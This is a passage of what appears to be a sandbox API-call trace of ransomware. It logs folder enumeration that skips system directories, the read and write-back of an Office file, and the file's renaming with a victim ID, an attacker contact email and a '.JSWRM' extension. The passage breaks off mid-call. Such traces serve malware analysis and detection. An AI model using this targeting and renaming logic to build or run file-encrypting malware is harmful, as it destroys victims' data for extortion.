lstrcmpiW (lpString1="RSWOP.ICM", lpString2="$RECYCLE.BIN") returned 1 [0143.822] lstrcmpiW (lpString1="RSWOP.ICM", lpString2="system volume information") returned -1 [0143.822] lstrcmpiW (lpString1="RSWOP.ICM", lpString2="msocache") returned 1 [0143.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0143.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RSWOP.ICM", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0143.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RSWOP.ICM", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RSWOP.ICM", lpUsedDefaultChar=0x0) returned 9 [0143.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0143.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0143.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RSWOP.ICM", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0143.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RSWOP.ICM", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RSWOP.ICM", lpUsedDefaultChar=0x0) returned 9 [0143.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0143.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0143.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0143.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0143.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0143.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0143.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\RSWOP.ICM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\rswop.icm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0143.824] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=218103) returned 1 [0143.824] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0143.824] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0143.839] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.839] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0143.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0143.840] CloseHandle (hObject=0x45c) returned 1 [0143.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0143.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0143.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0143.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0143.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0143.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0143.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0143.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0143.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0143.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0143.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0143.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24c0c8 [0143.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0143.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f3a8 [0143.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0143.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0143.840] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\RSWOP.ICM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\rswop.icm"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\RSWOP.ICM.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\rswop.icm.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0143.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0143.841] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0143.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0143.842] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd5c3007, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdecdccb3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdf2ac886, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x377cb8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Rtmcodecs.dll", cAlternateFileName="RTMCOD~1.DLL")) returned 1 [0143.842] lstrcmpiW (lpString1="Rtmcodecs.dll", lpString2=".") returned 1 [0143.842] lstrcmpiW (lpString1="Rtmcodecs.dll", lpString2="..") returned 1 [0143.842] lstrcmpiW (lpString1="Rtmcodecs.dll", lpString2="...") returned 1 [0143.842] lstrcmpiW (lpString1="Rtmcodecs.dll", lpString2="windows") returned -1 [0143.842] lstrcmpiW (lpString1="Rtmcodecs.dll", lpString2="recovery") returned 1 [0143.842] lstrcmpiW (lpString1="Rtmcodecs.dll", lpString2="perflogs") returned 1 [0143.842] lstrcmpiW (lpString1="Rtmcodecs.dll", lpString2="documents and settings") returned 1 [0143.842] lstrcmpiW (lpString1="Rtmcodecs.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.842] lstrcmpiW (lpString1="Rtmcodecs.dll", lpString2="system volume information") returned -1 [0143.842] lstrcmpiW (lpString1="Rtmcodecs.dll", lpString2="msocache") returned 1 [0143.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0143.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rtmcodecs.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0143.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rtmcodecs.dll", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rtmcodecs.dll", lpUsedDefaultChar=0x0) returned 13 [0143.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0143.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0143.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rtmcodecs.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0143.842] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rtmcodecs.dll", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rtmcodecs.dll", lpUsedDefaultChar=0x0) returned 13 [0143.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0143.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0143.842] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0143.842] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd7406da, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcd7406da, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdee5a425, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xe44d0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Rtmmediamanager.dll", cAlternateFileName="RTMMED~1.DLL")) returned 1 [0143.842] lstrcmpiW (lpString1="Rtmmediamanager.dll", lpString2=".") returned 1 [0143.842] lstrcmpiW (lpString1="Rtmmediamanager.dll", lpString2="..") returned 1 [0143.842] lstrcmpiW (lpString1="Rtmmediamanager.dll", lpString2="...") returned 1 [0143.842] lstrcmpiW (lpString1="Rtmmediamanager.dll", lpString2="windows") returned -1 [0143.842] lstrcmpiW (lpString1="Rtmmediamanager.dll", lpString2="recovery") returned 1 [0143.842] lstrcmpiW (lpString1="Rtmmediamanager.dll", lpString2="perflogs") returned 1 [0143.842] lstrcmpiW (lpString1="Rtmmediamanager.dll", lpString2="documents and settings") returned 1 [0143.842] lstrcmpiW (lpString1="Rtmmediamanager.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.842] lstrcmpiW (lpString1="Rtmmediamanager.dll", lpString2="system volume information") returned -1 [0143.843] lstrcmpiW (lpString1="Rtmmediamanager.dll", lpString2="msocache") returned 1 [0143.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0143.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rtmmediamanager.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0143.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0143.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rtmmediamanager.dll", cchWideChar=19, lpMultiByteStr=0x241330, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rtmmediamanager.dll", lpUsedDefaultChar=0x0) returned 19 [0143.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0143.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0143.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rtmmediamanager.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0143.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0143.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rtmmediamanager.dll", cchWideChar=19, lpMultiByteStr=0x241308, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rtmmediamanager.dll", lpUsedDefaultChar=0x0) returned 19 [0143.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0143.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0143.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0143.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0143.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0143.843] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd7406da, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdee341d6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdee5a425, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x130b0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Rtmmvras.dll", cAlternateFileName="")) returned 1 [0143.843] lstrcmpiW (lpString1="Rtmmvras.dll", lpString2=".") returned 1 [0143.843] lstrcmpiW (lpString1="Rtmmvras.dll", lpString2="..") returned 1 [0143.843] lstrcmpiW (lpString1="Rtmmvras.dll", lpString2="...") returned 1 [0143.843] lstrcmpiW (lpString1="Rtmmvras.dll", lpString2="windows") returned -1 [0143.843] lstrcmpiW (lpString1="Rtmmvras.dll", lpString2="recovery") returned 1 [0143.843] lstrcmpiW (lpString1="Rtmmvras.dll", lpString2="perflogs") returned 1 [0143.843] lstrcmpiW (lpString1="Rtmmvras.dll", lpString2="documents and settings") returned 1 [0143.843] lstrcmpiW (lpString1="Rtmmvras.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.843] lstrcmpiW (lpString1="Rtmmvras.dll", lpString2="system volume information") returned -1 [0143.843] lstrcmpiW (lpString1="Rtmmvras.dll", lpString2="msocache") returned 1 [0143.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0143.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rtmmvras.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rtmmvras.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rtmmvras.dll", lpUsedDefaultChar=0x0) returned 12 [0143.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0143.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0143.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rtmmvras.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.843] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rtmmvras.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rtmmvras.dll", lpUsedDefaultChar=0x0) returned 12 [0143.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0143.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0143.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0143.844] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd7406da, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcd7406da, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcd7406da, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xdab0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="rtmmvrcs.dll", cAlternateFileName="")) returned 1 [0143.844] lstrcmpiW (lpString1="rtmmvrcs.dll", lpString2=".") returned 1 [0143.844] lstrcmpiW (lpString1="rtmmvrcs.dll", lpString2="..") returned 1 [0143.844] lstrcmpiW (lpString1="rtmmvrcs.dll", lpString2="...") returned 1 [0143.844] lstrcmpiW (lpString1="rtmmvrcs.dll", lpString2="windows") returned -1 [0143.844] lstrcmpiW (lpString1="rtmmvrcs.dll", lpString2="recovery") returned 1 [0143.844] lstrcmpiW (lpString1="rtmmvrcs.dll", lpString2="perflogs") returned 1 [0143.844] lstrcmpiW (lpString1="rtmmvrcs.dll", lpString2="documents and settings") returned 1 [0143.844] lstrcmpiW (lpString1="rtmmvrcs.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.844] lstrcmpiW (lpString1="rtmmvrcs.dll", lpString2="system volume information") returned -1 [0143.844] lstrcmpiW (lpString1="rtmmvrcs.dll", lpString2="msocache") returned 1 [0143.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0143.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rtmmvrcs.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rtmmvrcs.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rtmmvrcs.dll", lpUsedDefaultChar=0x0) returned 12 [0143.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0143.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0143.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rtmmvrcs.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rtmmvrcs.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rtmmvrcs.dll", lpUsedDefaultChar=0x0) returned 12 [0143.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0143.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0143.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0143.844] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xede1d373, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xede1d373, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x23572815, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x126b0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="rtmmvrhw.dll", cAlternateFileName="")) returned 1 [0143.844] lstrcmpiW (lpString1="rtmmvrhw.dll", lpString2=".") returned 1 [0143.844] lstrcmpiW (lpString1="rtmmvrhw.dll", lpString2="..") returned 1 [0143.844] lstrcmpiW (lpString1="rtmmvrhw.dll", lpString2="...") returned 1 [0143.844] lstrcmpiW (lpString1="rtmmvrhw.dll", lpString2="windows") returned -1 [0143.844] lstrcmpiW (lpString1="rtmmvrhw.dll", lpString2="recovery") returned 1 [0143.844] lstrcmpiW (lpString1="rtmmvrhw.dll", lpString2="perflogs") returned 1 [0143.844] lstrcmpiW (lpString1="rtmmvrhw.dll", lpString2="documents and settings") returned 1 [0143.844] lstrcmpiW (lpString1="rtmmvrhw.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.844] lstrcmpiW (lpString1="rtmmvrhw.dll", lpString2="system volume information") returned -1 [0143.844] lstrcmpiW (lpString1="rtmmvrhw.dll", lpString2="msocache") returned 1 [0143.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0143.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rtmmvrhw.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rtmmvrhw.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rtmmvrhw.dll", lpUsedDefaultChar=0x0) returned 12 [0143.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0143.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0143.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rtmmvrhw.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0143.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rtmmvrhw.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rtmmvrhw.dll", lpUsedDefaultChar=0x0) returned 12 [0143.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0143.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0143.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0143.845] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd7406da, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcd7406da, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcd7406da, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa0c8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Rtmmvrsplitter.dll", cAlternateFileName="RTMMVR~1.DLL")) returned 1 [0143.845] lstrcmpiW (lpString1="Rtmmvrsplitter.dll", lpString2=".") returned 1 [0143.845] lstrcmpiW (lpString1="Rtmmvrsplitter.dll", lpString2="..") returned 1 [0143.845] lstrcmpiW (lpString1="Rtmmvrsplitter.dll", lpString2="...") returned 1 [0143.845] lstrcmpiW (lpString1="Rtmmvrsplitter.dll", lpString2="windows") returned -1 [0143.845] lstrcmpiW (lpString1="Rtmmvrsplitter.dll", lpString2="recovery") returned 1 [0143.845] lstrcmpiW (lpString1="Rtmmvrsplitter.dll", lpString2="perflogs") returned 1 [0143.845] lstrcmpiW (lpString1="Rtmmvrsplitter.dll", lpString2="documents and settings") returned 1 [0143.845] lstrcmpiW (lpString1="Rtmmvrsplitter.dll", lpString2="$RECYCLE.BIN") returned 1 [0143.845] lstrcmpiW (lpString1="Rtmmvrsplitter.dll", lpString2="system volume information") returned -1 [0143.845] lstrcmpiW (lpString1="Rtmmvrsplitter.dll", lpString2="msocache") returned 1 [0143.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0143.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rtmmvrsplitter.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0143.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0143.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rtmmvrsplitter.dll", cchWideChar=18, lpMultiByteStr=0x241268, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rtmmvrsplitter.dll", lpUsedDefaultChar=0x0) returned 18 [0143.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0143.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0143.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rtmmvrsplitter.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0143.845] RtlAllocateHeap (HeapHandle=0x1e0000, 